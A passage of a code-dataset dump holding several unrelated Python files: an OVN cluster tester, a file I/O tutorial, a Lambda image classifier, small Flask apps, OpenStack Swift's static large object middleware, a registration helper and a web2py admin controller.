DEFAULT_NS_VIP_SUBNET6\n vip_net = vip_ns_subnet.next(self.cluster.n_ns)\n n_vips = len(self.load_balancer.vips.keys())\n vip_ip = vip_net.ip.__add__(n_vips + 1)\n\n if version == 6:\n vips = {\n f'[{vip_ip + i}]:{DEFAULT_VIP_PORT}': [\n f'[{p.ip6}]:{DEFAULT_BACKEND_PORT}' for p in ports\n ]\n for i, ports in enumerate(backend_lists)\n }\n self.load_balancer.add_vips(vips)\n else:\n vips = {\n f'{vip_ip + i}:{DEFAULT_VIP_PORT}': [\n f'{p.ip}:{DEFAULT_BACKEND_PORT}' for p in ports\n ]\n for i, ports in enumerate(backend_lists)\n }\n self.load_balancer.add_vips(vips)\n\n\nclass Cluster(object):\n def __init__(self, central_node, worker_nodes, cluster_cfg, brex_cfg):\n # In clustered mode use the first node for provisioning.\n self.central_node = central_node\n self.worker_nodes = worker_nodes\n self.cluster_cfg = cluster_cfg\n self.brex_cfg = brex_cfg\n self.nbctl = None\n self.sbctl = None\n self.net = cluster_cfg.cluster_net\n self.router = None\n self.load_balancer = None\n self.load_balancer6 = None\n self.join_switch = None\n self.last_selected_worker = 0\n self.n_ns = 0\n\n def start(self):\n self.central_node.start(self.cluster_cfg)\n nb_conn = self.central_node.get_connection_string(\n self.cluster_cfg, 6641\n )\n inactivity_probe = self.cluster_cfg.db_inactivity_probe // 1000\n self.nbctl = ovn_utils.OvnNbctl(\n self.central_node, nb_conn, inactivity_probe\n )\n\n sb_conn = self.central_node.get_connection_string(\n self.cluster_cfg, 6642\n )\n self.sbctl = ovn_utils.OvnSbctl(\n self.central_node, sb_conn, inactivity_probe\n )\n for w in self.worker_nodes:\n w.start(self.cluster_cfg)\n w.configure(self.brex_cfg.physical_net)\n\n self.nbctl.set_global(\n 'use_logical_dp_groups', self.cluster_cfg.logical_dp_groups\n )\n self.nbctl.set_global(\n 'northd_probe_interval', self.cluster_cfg.northd_probe_interval\n )\n self.nbctl.set_inactivity_probe(self.cluster_cfg.db_inactivity_probe)\n self.sbctl.set_inactivity_probe(self.cluster_cfg.db_inactivity_probe)\n\n def create_cluster_router(self, rtr_name):\n self.router = self.nbctl.lr_add(rtr_name)\n self.nbctl.lr_set_options(\n self.router,\n {\n 'always_learn_from_arp_request': 'false',\n },\n )\n\n def create_cluster_load_balancer(self, lb_name, global_cfg):\n if global_cfg.run_ipv4:\n self.load_balancer = lb.OvnLoadBalancer(\n lb_name, self.nbctl, self.cluster_cfg.vips\n )\n self.load_balancer.add_vips(self.cluster_cfg.static_vips)\n\n if global_cfg.run_ipv6:\n self.load_balancer6 = lb.OvnLoadBalancer(\n f'{lb_name}6', self.nbctl, self.cluster_cfg.vips6\n )\n self.load_balancer6.add_vips(self.cluster_cfg.static_vips6)\n\n def create_cluster_join_switch(self, sw_name):\n self.join_switch = self.nbctl.ls_add(\n sw_name, net_s=self.cluster_cfg.gw_net\n )\n\n self.join_rp = self.nbctl.lr_port_add(\n self.router,\n 'rtr-to-join',\n RandMac(),\n self.cluster_cfg.gw_net.reverse(),\n )\n self.join_ls_rp = self.nbctl.ls_port_add(\n self.join_switch, 'join-to-rtr', self.join_rp\n )\n\n def provision_ports(self, n_ports, passive=False):\n return [\n self.select_worker_for_port().provision_ports(self, 1, passive)[0]\n for _ in range(n_ports)\n ]\n\n def unprovision_ports(self, ports):\n for port in ports:\n worker = port.metadata\n worker.unprovision_port(self, port)\n\n def ping_ports(self, ports):\n ports_per_worker = defaultdict(list)\n for p in ports:\n ports_per_worker[p.metadata].append(p)\n for w, ports in ports_per_worker.items():\n w.ping_ports(self, ports)\n\n @ovn_stats.timeit\n def provision_vips_to_load_balancers(self, backend_lists):\n n_vips = len(self.load_balancer.vips.keys())\n vip_ip = self.cluster_cfg.vip_subnet.ip.__add__(n_vips + 1)\n\n vips = {\n f'{vip_ip + i}:{DEFAULT_VIP_PORT}': [\n f'{p.ip}:{DEFAULT_BACKEND_PORT}' for p in ports\n ]\n for i, ports in enumerate(backend_lists)\n }\n self.load_balancer.add_vips(vips)\n\n def unprovision_vips(self):\n if self.load_balancer:\n self.load_balancer.clear_vips()\n self.load_balancer.add_vips(self.cluster_cfg.static_vips)\n if self.load_balancer6:\n self.load_balancer6.clear_vips()\n self.load_balancer6.add_vips(self.cluster_cfg.static_vips6)\n\n def select_worker_for_port(self):\n self.last_selected_worker += 1\n self.last_selected_worker %= len(self.worker_nodes)\n return self.worker_nodes[self.last_selected_worker]\n\n def provision_lb_group(self):\n self.lb_group = lb.OvnLoadBalancerGroup('cluster-lb-group', self.nbctl)\n for w in self.worker_nodes:\n self.nbctl.ls_add_lbg(w.switch, self.lb_group.lbg)\n self.nbctl.lr_add_lbg(w.gw_router, self.lb_group.lbg)\n\n def provision_lb(self, lb):\n log.info(f'Creating load balancer {lb.name}')\n self.lb_group.add_lb(lb)\n","sub_path":"ovn-tester/ovn_workload.py","file_name":"ovn_workload.py","file_ext":"py","file_size_in_byte":29793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"208618907","text":"# 读写文件\n\nimport json\n\n# 1.使用with语句:自动关闭文件,不使用的话得调用f.close()\n# It is good practice to use the with keyword when dealing with file objects. The advantage is that the file is\n# properly closed after its suite finishes, even if an exception is raised at some point. Using with is also much\n# shorter than writing equivalent try-finally blocks:\nworkfile = 'workfile'\nwith open(workfile) as f:\n read_data = f.read() # read不加size read(size) 默认读取所有行\n # print(read_data)\n# print(f.closed)\n\n# Methods of File Objects\n\n# 2.读取一行:\n# with:自动关闭文件\n# To read a file’s contents, call f.read(size), which reads some quantity of data and returns it as a string (in text\n# mode) or bytes object (in binary mode). size is an optional numeric argument. When size is omitted or negative,\n# the entire contents of the file will be read and returned; it’s your problem if the file is twice as large as your\n# machine’s memory. Otherwise, at most size bytes are read and returned. If the end of the file has been reached,\n# f.read() will return an empty string ('').\nwith open(workfile) as f:\n # f.read()\n while read_data:\n read_data = f.readline()\n # print(read_data, end='')\n# For reading lines from a file, you can loop over the file object. This is memory efficient, fast, and leads to\n# simple code:\nf = open(workfile, 'r+')\nfor line in f:\n print(line, end='')\nf.close()\n\n# 3.读取所有行:\n# If you want to read all the lines of a file in a list you can also use list(f) or f.readlines().\nf = open(workfile, 'r+')\n\ntext = f.readlines()\nprint('read all lines:' + str(text))\n\n# 4.写入数据\n# f.write(string) writes the contents of string to the file, returning the number of characters written.\nwriteNum = f.write('This is a test\\n')\nprint('write num:' + str(writeNum))\n\n# 5.读写权限\n# The first argument is a string containing the filename. The second argument is another string containing a few\n# characters describing the way in which the file will be used. mode can be 'r' when the file will only be read,\n# 'w' for only writing (an existing file with the same name will be erased), and 'a' opens the file for appending;\n# any data written to the file is automatically added to the end. 'r+' opens the file for both reading and writing.\n# The mode argument is optional; 'r' will be assumed if it’s omitted.\n\n# f.tell() returns an integer giving the file object’s current position in the file represented as number of bytes\n# from the beginning of the file when in binary mode and an opaque number when in text mode.\nprint(f.tell())\n\n# 6.json\nprint(json.dumps([1, 'simple', 'list']))\n# 直接dump到文件里\n# Another variant of the dumps() function, called dump(), simply serializes the object to a text file. So if f is a\n# text file object opened for writing, we can do this:\njson.dump('json', f)\n# 从文件中读取json\nf1 = open('jsonFile', 'r')\nprint(json.load(f1))\n\n\n# 1 read files\n# \"r\" - Read - Default value. Opens a file for reading, error if the file does not exist\n# \"a\" - Append - Opens a file for appending, creates the file if it does not exist\n# \"w\" - Write - Opens a file for writing, creates the file if it does not exist\n# \"x\" - Create - Creates the specified file, returns an error if the file exists\n\n# In addition you can specify if the file should be handled as binary or text mode\n# \"t\" - Text - Default value. Text mode\n# \"b\" - Binary - Binary mode (e.g. images)\n\n\nf = open(\"jsonFile.txt\", \"r\")\nprint(f.read())\n\n# By default the read() method returns the whole text, but you can also specify how many character you want to return:\nf = open(\"demofile.txt\", \"r\")\nprint(f.read(5))\n\n# 2 write files\n# Open the file \"demofile.txt\" and append content to the file:\nf = open(\"demofile.txt\", \"a\")\nf.write(\"Now the file has one more line!\")\n\n# Open the file \"demofile.txt\" and overwrite the content:\nf = open(\"demofile.txt\", \"w\")\nf.write(\"Woops! I have deleted the content!\")\n\n# Create a New File\n# To create a new file in Python, use the open() method, with one of the following parameters:\n# \"x\" - Create - will create a file, returns an error if the file exist\n# \"a\" - Append - will create a file if the specified file does not exist\n# \"w\" - Write - will create a file if the specified file does not exist\n# Create a file called \"myfile.txt\":\nf = open(\"myfile.txt\", \"x\")\n\n# Create a new file if it does not exist:\nf = open(\"myfile.txt\", \"w\")\n\n# Delete a File\nimport os\nos.remove(\"/data/a.log \")\n\nif os.path.exists(\"demofile.txt\"):\n os.remove(\"demofile.txt\")\n\n# Delete Folder\nos.rmdir(\"myfolder\")","sub_path":"file/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"126180599","text":"try:\n import unzip_requirements\nexcept ImportError:\n pass\nimport io\nimport os\nimport time\n\nimport boto3\nimport requests\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\ns3_resource = boto3.resource('s3')\n\nimg_tranforms = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n])\n\n\ndef download_image(url):\n try:\n r = requests.get(url)\n if r.status_code == 200:\n f = io.BytesIO(r.content)\n img = Image.open(f)\n return img\n else:\n return None\n except:\n return None\n\n\ndef download_model(bucket='', key=''):\n location = f'/tmp/{os.path.basename(key)}'\n if not os.path.exists(location):\n s3_resource.Object(bucket, key).download_file(location)\n return location\n\n\ndef classify_image(model_path, img):\n model = torch.jit.load(model_path)\n img = img_tranforms(img).unsqueeze(0)\n cl = model(img).argmax().item()\n return cl\n\n\ndef lambda_handler(event, context):\n # download model\n model_path = download_model(\n bucket='segmentsai-dl', key='models/pytorch_model.pt')\n # download image\n img = download_image(event['url'])\n # classify image\n if img:\n cl = classify_image(model_path, img)\n return {\n 'statusCode': 200,\n 'class': cl\n }\n else:\n return {\n 'statusCode': 404,\n 'class': None\n }","sub_path":"aws_lambda/.ipynb_checkpoints/main-checkpoint.py","file_name":"main-checkpoint.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"288789948","text":"from flask.app import Flask\r\nfrom flask_sqlalchemy import SQLAlchemy\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='oracle://vineethkuttan:hero@localhost:1521/XE'\r\ndb=SQLAlchemy(app)\r\nclass User(db.Model):\r\n __tablename__=\"tbl_user\"\r\n id=db.Column(db.Integer,primary_key=True)\r\n name=db.Column(db.String(20))\r\n address=db.Column(db.String(20))\r\n@app.route('/home///
    ')\r\ndef index(id,name,address):\r\n user=User(id=id,name=name,address=address)\r\n db.session.add(user)\r\n db.session.commit()\r\n return f\"

    Added new USER {id} {name} {address}

    \"\r\nif __name__==\"__main__\":\r\n db.create_all()\r\n app.run(port=8090,debug=True)\r\n","sub_path":"PYTHON/flaskandsqlalchemy/example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"588316353","text":"from flask import Flask \nfrom flask import request \nfrom flask import Response \n\nimport os \n\napp = Flask(__name__)\n\nos.environ['LOG_FILE_PATH'] = \"log/analytics.json\"\n\nLOG_FILE_PATH = os.environ['LOG_FILE_PATH']\n\nprint(LOG_FILE_PATH)\n\n\n#GET DIRECTORY OF FILEPATH (IN OS LIBRARY\ndirectory = os.path.dirname(LOG_FILE_PATH)\nos.makedirs(directory, exist_ok = True) #if directory does not exist make one\n\t\n\t\t\n@app.route('/', methods = ['GET','POST'])\ndef Log():\n\tif request.method == 'POST':\n\t\tdata = request.get_json(force = True)\n\n\t\twith open(LOG_FILE_PATH, 'a') as file:\n\t\t\tfile.write(str(data)) \n\t\t\n\t\treturn Response()\n\n\n\telif request.method == 'GET':\n\t\treturn Response()\n\n\t\t\n\n#this allows us to run our app\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=8000, debug=True)\n\n\n\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"54236028","text":"# Copyright (c) 2013 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nMiddleware that will provide Static Large Object (SLO) support.\n\nThis feature is very similar to Dynamic Large Object (DLO) support in that\nit allows the user to upload many objects concurrently and afterwards\ndownload them as a single object. It is different in that it does not rely\non eventually consistent container listings to do so. Instead, a user\ndefined manifest of the object segments is used.\n\n----------------------\nUploading the Manifest\n----------------------\n\nAfter the user has uploaded the objects to be concatenated a manifest is\nuploaded. The request must be a PUT with the query parameter::\n\n ?multipart-manifest=put\n\nThe body of this request will be an ordered list of files in\njson data format. The data to be supplied for each segment is::\n\n path: the path to the segment (not including account)\n /container/object_name\n etag: the etag given back when the segment was PUT\n size_bytes: the size of the segment in bytes\n\nThe format of the list will be::\n\n json:\n [{\"path\": \"/cont/object\",\n \"etag\": \"etagoftheobjectsegment\",\n \"size_bytes\": 1048576}, ...]\n\nThe number of object segments is limited to a configurable amount, default\n1000. Each segment, except for the final one, must be at least 1 megabyte\n(configurable). On upload, the middleware will head every segment passed in and\nverify the size and etag of each. If any of the objects do not match (not\nfound, size/etag mismatch, below minimum size) then the user will receive a 4xx\nerror response. If everything does match, the user will receive a 2xx response\nand the SLO object is ready for downloading.\n\nBehind the scenes, on success, a json manifest generated from the user input is\nsent to object servers with an extra \"X-Static-Large-Object: True\" header\nand a modified Content-Type. The parameter: swift_bytes=$total_size will be\nappended to the existing Content-Type, where total_size is the sum of all\nthe included segments' size_bytes. This extra parameter will be hidden from\nthe user.\n\nManifest files can reference objects in separate containers, which will improve\nconcurrent upload speed. Objects can be referenced by multiple manifests. The\nsegments of a SLO manifest can even be other SLO manifests. Treat them as any\nother object i.e., use the Etag and Content-Length given on the PUT of the\nsub-SLO in the manifest to the parent SLO.\n\n-------------------------\nRetrieving a Large Object\n-------------------------\n\nA GET request to the manifest object will return the concatenation of the\nobjects from the manifest much like DLO. If any of the segments from the\nmanifest are not found or their Etag/Content Length no longer match the\nconnection will drop. In this case a 409 Conflict will be logged in the proxy\nlogs and the user will receive incomplete results.\n\nThe headers from this GET or HEAD request will return the metadata attached\nto the manifest object itself with some exceptions::\n\n Content-Length: the total size of the SLO (the sum of the sizes of\n the segments in the manifest)\n X-Static-Large-Object: True\n Etag: the etag of the SLO (generated the same way as DLO)\n\nA GET request with the query parameter::\n\n ?multipart-manifest=get\n\nWill return the actual manifest file itself. This is generated json and does\nnot match the data sent from the original multipart-manifest=put. This call's\nmain purpose is for debugging.\n\nWhen the manifest object is uploaded you are more or less guaranteed that\nevery segment in the manifest exists and matched the specifications.\nHowever, there is nothing that prevents the user from breaking the\nSLO download by deleting/replacing a segment referenced in the manifest. It is\nleft to the user use caution in handling the segments.\n\n-----------------------\nDeleting a Large Object\n-----------------------\n\nA DELETE request will just delete the manifest object itself.\n\nA DELETE with a query parameter::\n\n ?multipart-manifest=delete\n\nwill delete all the segments referenced in the manifest and then the manifest\nitself. The failure response will be similar to the bulk delete middleware.\n\n------------------------\nModifying a Large Object\n------------------------\n\nPUTs / POSTs will work as expected, PUTs will just overwrite the manifest\nobject for example.\n\n------------------\nContainer Listings\n------------------\n\nIn a container listing the size listed for SLO manifest objects will be the\ntotal_size of the concatenated segments in the manifest. The overall\nX-Container-Bytes-Used for the container (and subsequently for the account)\nwill not reflect total_size of the manifest but the actual size of the json\ndata stored. The reason for this somewhat confusing discrepancy is we want the\ncontainer listing to reflect the size of the manifest object when it is\ndownloaded. We do not, however, want to count the bytes-used twice (for both\nthe manifest and the segments it's referring to) in the container and account\nmetadata which can be used for stats purposes.\n\"\"\"\n\nfrom urllib import quote\nfrom cStringIO import StringIO\nfrom datetime import datetime\nimport mimetypes\nfrom hashlib import md5\nfrom swift.common.swob import Request, HTTPBadRequest, HTTPServerError, \\\n HTTPMethodNotAllowed, HTTPRequestEntityTooLarge, HTTPLengthRequired, \\\n HTTPOk, HTTPPreconditionFailed, HTTPException, HTTPNotFound, \\\n HTTPUnauthorized\nfrom swift.common.utils import (json, get_logger, config_true_value,\n register_swift_info)\nfrom swift.common.constraints import check_utf8, MAX_BUFFERED_SLO_SEGMENTS\nfrom swift.common.http import HTTP_NOT_FOUND, HTTP_UNAUTHORIZED\nfrom swift.common.wsgi import WSGIContext\nfrom swift.common.middleware.bulk import get_response_body, \\\n ACCEPTABLE_FORMATS, Bulk\n\n\ndef parse_input(raw_data):\n \"\"\"\n Given a request will parse the body and return a list of dictionaries\n :raises: HTTPException on parse errors\n :returns: a list of dictionaries on success\n \"\"\"\n try:\n parsed_data = json.loads(raw_data)\n except ValueError:\n raise HTTPBadRequest(\"Manifest must be valid json.\")\n\n req_keys = set(['path', 'etag', 'size_bytes'])\n try:\n for seg_dict in parsed_data:\n if (set(seg_dict) != req_keys or\n '/' not in seg_dict['path'].lstrip('/')):\n raise HTTPBadRequest('Invalid SLO Manifest File')\n except (AttributeError, TypeError):\n raise HTTPBadRequest('Invalid SLO Manifest File')\n\n return parsed_data\n\n\nclass SloContext(WSGIContext):\n\n def __init__(self, slo, slo_etag):\n WSGIContext.__init__(self, slo.app)\n self.slo_etag = '\"' + slo_etag.hexdigest() + '\"'\n\n def handle_slo_put(self, req, start_response):\n app_resp = self._app_call(req.environ)\n\n for i in xrange(len(self._response_headers)):\n if self._response_headers[i][0].lower() == 'etag':\n self._response_headers[i] = ('Etag', self.slo_etag)\n break\n\n start_response(self._response_status,\n self._response_headers,\n self._response_exc_info)\n return app_resp\n\n\nclass StaticLargeObject(object):\n \"\"\"\n StaticLargeObject Middleware\n\n See above for a full description.\n\n The proxy logs created for any subrequests made will have swift.source set\n to \"SLO\".\n\n :param app: The next WSGI filter or app in the paste.deploy chain.\n :param conf: The configuration dict for the middleware.\n \"\"\"\n\n def __init__(self, app, conf):\n self.conf = conf\n self.app = app\n self.logger = get_logger(conf, log_route='slo')\n self.max_manifest_segments = int(self.conf.get('max_manifest_segments',\n 1000))\n self.max_manifest_size = int(self.conf.get('max_manifest_size',\n 1024 * 1024 * 2))\n self.min_segment_size = int(self.conf.get('min_segment_size',\n 1024 * 1024))\n self.bulk_deleter = Bulk(app, {})\n\n def handle_multipart_put(self, req, start_response):\n \"\"\"\n Will handle the PUT of a SLO manifest.\n Heads every object in manifest to check if is valid and if so will\n save a manifest generated from the user input. Uses WSGIContext to\n call self.app and start_response and returns a WSGI iterator.\n\n :params req: a swob.Request with an obj in path\n :raises: HttpException on errors\n \"\"\"\n try:\n vrs, account, container, obj = req.split_path(1, 4, True)\n except ValueError:\n return self.app(req.environ, start_response)\n if req.content_length > self.max_manifest_size:\n raise HTTPRequestEntityTooLarge(\n \"Manifest File > %d bytes\" % self.max_manifest_size)\n if req.headers.get('X-Copy-From'):\n raise HTTPMethodNotAllowed(\n 'Multipart Manifest PUTs cannot be Copy requests')\n if req.content_length is None and \\\n req.headers.get('transfer-encoding', '').lower() != 'chunked':\n raise HTTPLengthRequired(request=req)\n parsed_data = parse_input(req.body_file.read(self.max_manifest_size))\n problem_segments = []\n\n if len(parsed_data) > self.max_manifest_segments:\n raise HTTPRequestEntityTooLarge(\n 'Number segments must be <= %d' % self.max_manifest_segments)\n total_size = 0\n out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)\n if not out_content_type:\n out_content_type = 'text/plain'\n data_for_storage = []\n slo_etag = md5()\n for index, seg_dict in enumerate(parsed_data):\n obj_name = seg_dict['path']\n if isinstance(obj_name, unicode):\n obj_name = obj_name.encode('utf-8')\n obj_path = '/'.join(['', vrs, account, obj_name.lstrip('/')])\n try:\n seg_size = int(seg_dict['size_bytes'])\n except (ValueError, TypeError):\n raise HTTPBadRequest('Invalid Manifest File')\n if seg_size < self.min_segment_size and \\\n (index == 0 or index < len(parsed_data) - 1):\n raise HTTPBadRequest(\n 'Each segment, except the last, must be larger than '\n '%d bytes.' % self.min_segment_size)\n\n new_env = req.environ.copy()\n new_env['PATH_INFO'] = obj_path\n new_env['REQUEST_METHOD'] = 'HEAD'\n new_env['swift.source'] = 'SLO'\n del(new_env['wsgi.input'])\n del(new_env['QUERY_STRING'])\n new_env['CONTENT_LENGTH'] = 0\n new_env['HTTP_USER_AGENT'] = \\\n '%s MultipartPUT' % req.environ.get('HTTP_USER_AGENT')\n head_seg_resp = \\\n Request.blank(obj_path, new_env).get_response(self.app)\n if head_seg_resp.is_success:\n total_size += seg_size\n if seg_size != head_seg_resp.content_length:\n problem_segments.append([quote(obj_name), 'Size Mismatch'])\n if seg_dict['etag'] == head_seg_resp.etag:\n slo_etag.update(seg_dict['etag'])\n else:\n problem_segments.append([quote(obj_name), 'Etag Mismatch'])\n if head_seg_resp.last_modified:\n last_modified = head_seg_resp.last_modified\n else:\n # shouldn't happen\n last_modified = datetime.now()\n\n last_modified_formatted = \\\n last_modified.strftime('%Y-%m-%dT%H:%M:%S.%f')\n seg_data = {'name': '/' + seg_dict['path'].lstrip('/'),\n 'bytes': seg_size,\n 'hash': seg_dict['etag'],\n 'content_type': head_seg_resp.content_type,\n 'last_modified': last_modified_formatted}\n if config_true_value(\n head_seg_resp.headers.get('X-Static-Large-Object')):\n seg_data['sub_slo'] = True\n data_for_storage.append(seg_data)\n\n else:\n problem_segments.append([quote(obj_name),\n head_seg_resp.status])\n if problem_segments:\n resp_body = get_response_body(\n out_content_type, {}, problem_segments)\n raise HTTPBadRequest(resp_body, content_type=out_content_type)\n env = req.environ\n\n if not env.get('CONTENT_TYPE'):\n guessed_type, _junk = mimetypes.guess_type(req.path_info)\n env['CONTENT_TYPE'] = guessed_type or 'application/octet-stream'\n env['swift.content_type_overriden'] = True\n env['CONTENT_TYPE'] += \";swift_bytes=%d\" % total_size\n env['HTTP_X_STATIC_LARGE_OBJECT'] = 'True'\n json_data = json.dumps(data_for_storage)\n env['CONTENT_LENGTH'] = str(len(json_data))\n env['wsgi.input'] = StringIO(json_data)\n\n slo_context = SloContext(self, slo_etag)\n return slo_context.handle_slo_put(req, start_response)\n\n def get_segments_to_delete_iter(self, req):\n \"\"\"\n A generator function to be used to delete all the segments and\n sub-segments referenced in a manifest.\n\n :params req: a swob.Request with an SLO manifest in path\n :raises HTTPPreconditionFailed: on invalid UTF8 in request path\n :raises HTTPBadRequest: on too many buffered sub segments and\n on invalid SLO manifest path\n \"\"\"\n if not check_utf8(req.path_info):\n raise HTTPPreconditionFailed(\n request=req, body='Invalid UTF8 or contains NULL')\n try:\n vrs, account, container, obj = req.split_path(4, 4, True)\n except ValueError:\n raise HTTPBadRequest('Invalid SLO manifiest path')\n\n segments = [{\n 'sub_slo': True,\n 'name': ('/%s/%s' % (container, obj)).decode('utf-8')}]\n while segments:\n if len(segments) > MAX_BUFFERED_SLO_SEGMENTS:\n raise HTTPBadRequest(\n 'Too many buffered slo segments to delete.')\n seg_data = segments.pop(0)\n if seg_data.get('sub_slo'):\n try:\n segments.extend(\n self.get_slo_segments(seg_data['name'], req))\n except HTTPException as err:\n # allow bulk delete response to report errors\n seg_data['error'] = {'code': err.status_int,\n 'message': err.body}\n\n # add manifest back to be deleted after segments\n seg_data['sub_slo'] = False\n segments.append(seg_data)\n else:\n seg_data['name'] = seg_data['name'].encode('utf-8')\n yield seg_data\n\n def get_slo_segments(self, obj_name, req):\n \"\"\"\n Performs a swob.Request and returns the SLO manifest's segments.\n\n :raises HTTPServerError: on unable to load obj_name or\n on unable to load the SLO manifest data.\n :raises HTTPBadRequest: on not an SLO manifest\n :raises HTTPNotFound: on SLO manifest not found\n :returns: SLO manifest's segments\n \"\"\"\n vrs, account, _junk = req.split_path(2, 3, True)\n new_env = req.environ.copy()\n new_env['REQUEST_METHOD'] = 'GET'\n del(new_env['wsgi.input'])\n new_env['QUERY_STRING'] = 'multipart-manifest=get'\n new_env['CONTENT_LENGTH'] = 0\n new_env['HTTP_USER_AGENT'] = \\\n '%s MultipartDELETE' % new_env.get('HTTP_USER_AGENT')\n new_env['swift.source'] = 'SLO'\n new_env['PATH_INFO'] = (\n '/%s/%s/%s' % (\n vrs, account,\n obj_name.lstrip('/'))).encode('utf-8')\n resp = Request.blank('', new_env).get_response(self.app)\n\n if resp.is_success:\n if config_true_value(resp.headers.get('X-Static-Large-Object')):\n try:\n return json.loads(resp.body)\n except ValueError:\n raise HTTPServerError('Unable to load SLO manifest')\n else:\n raise HTTPBadRequest('Not an SLO manifest')\n elif resp.status_int == HTTP_NOT_FOUND:\n raise HTTPNotFound('SLO manifest not found')\n elif resp.status_int == HTTP_UNAUTHORIZED:\n raise HTTPUnauthorized('401 Unauthorized')\n else:\n raise HTTPServerError('Unable to load SLO manifest or segment.')\n\n def handle_multipart_delete(self, req):\n \"\"\"\n Will delete all the segments in the SLO manifest and then, if\n successful, will delete the manifest file.\n\n :params req: a swob.Request with an obj in path\n :returns: swob.Response whose app_iter set to Bulk.handle_delete_iter\n \"\"\"\n resp = HTTPOk(request=req)\n out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)\n if out_content_type:\n resp.content_type = out_content_type\n resp.app_iter = self.bulk_deleter.handle_delete_iter(\n req, objs_to_delete=self.get_segments_to_delete_iter(req),\n user_agent='MultipartDELETE', swift_source='SLO',\n out_content_type=out_content_type)\n return resp\n\n def __call__(self, env, start_response):\n \"\"\"\n WSGI entry point\n \"\"\"\n req = Request(env)\n try:\n vrs, account, container, obj = req.split_path(1, 4, True)\n except ValueError:\n return self.app(env, start_response)\n try:\n if obj:\n if req.method == 'PUT' and \\\n req.params.get('multipart-manifest') == 'put':\n return self.handle_multipart_put(req, start_response)\n if req.method == 'DELETE' and \\\n req.params.get('multipart-manifest') == 'delete':\n return self.handle_multipart_delete(req)(env,\n start_response)\n if 'X-Static-Large-Object' in req.headers:\n raise HTTPBadRequest(\n request=req,\n body='X-Static-Large-Object is a reserved header. '\n 'To create a static large object add query param '\n 'multipart-manifest=put.')\n except HTTPException as err_resp:\n return err_resp(env, start_response)\n\n return self.app(env, start_response)\n\n\ndef filter_factory(global_conf, **local_conf):\n conf = global_conf.copy()\n conf.update(local_conf)\n register_swift_info('slo')\n\n def slo_filter(app):\n return StaticLargeObject(app, conf)\n return slo_filter\n","sub_path":"swift/source/swift/swift/common/middleware/slo.py","file_name":"slo.py","file_ext":"py","file_size_in_byte":19547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"111075874","text":"from my_service import connect_db\n\ndef checkRegis(user):\n checkduplicate = False\n db = connect_db.connectMongoDB()\n if db.userlist.count_documents({'username': user }) != 0:\n checkduplicate = True\n print(\"Username is Same\")\n else:\n print(\"Username Not Same\")\n return (checkduplicate)\n\ndef insertRegister_to_Db(datainput):\n status = False\n db = connect_db.connectMongoDB()\n result = db.userlist.insert_one(datainput)\n if result.inserted_id != \"\":\n status = True\n return (status)\n\ndef check_inputNormal(input):\n print(\"Check null value ==> wait...\")\n status = False\n for key,i in enumerate(input): #If have null value ==> False\n if i != \"\":\n print(\"Check null value in Index [{}] ==> ok\".format(key))\n status = True\n else:\n status = False\n print(\"==> Found null value!\")\n break\n return (status)","sub_path":"my_service/check_register.py","file_name":"check_register.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"456957205","text":"# -*- coding: utf-8 -*-\n# ---\n@auth.requires(auth.has_membership ('Super') )\ndef index():\n temp='''var confirmar=confirm(\n \"Se van a borrar todos los datos del cliente, esta seguro???\");\n if (confirmar){ajax('ajax_borrarTodo','[id]','resultado');}\n else {alert('no borrado');}\n '''\n\n btn_borrardatos=A('Borrar todos Datos', _class='btn btn-warning', _name='btn_borrardatos',\n _onclick=temp)\n return dict(btn_borrardatos=btn_borrardatos)\n\n@auth.requires(auth.has_membership ('Super') )\ndef ajax_borrarTodo():\n db(db.auth_user.id>2).delete()\n db(db.tbl_recepcion.id>0).delete()\n db(db.tbl_control_maestro.id>0).delete()\n db.commit()\n db.executesql ('ALTER TABLE auth_user AUTO_INCREMENT = 3;')\n db.executesql ('ALTER TABLE tbl_cliente AUTO_INCREMENT = 1;')\n db.executesql ('ALTER TABLE tbl_recepcion AUTO_INCREMENT = 1;')\n db.executesql ('ALTER TABLE tbl_control_maestro AUTO_INCREMENT = 1;')\n return \"Se a eliminado los datos;\"\n","sub_path":"controllers/cntrpal.py","file_name":"cntrpal.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"131762011","text":"\"\"\"PickleCache.py\n\nPickleCache provides tools for keeping fast-loading cached versions of\nfiles so that subsequent loads are faster. This is similar to how Python\nsilently caches .pyc files next to .py files.\n\nThe typical scenario is that you have a type of text file that gets\n\"translated\" to Pythonic data (dictionaries, tuples, instances, ints,\netc.). By caching the Python data on disk in pickle format, you can\navoid the expensive translation on subsequent reads of the file.\n\nTwo real life cases are 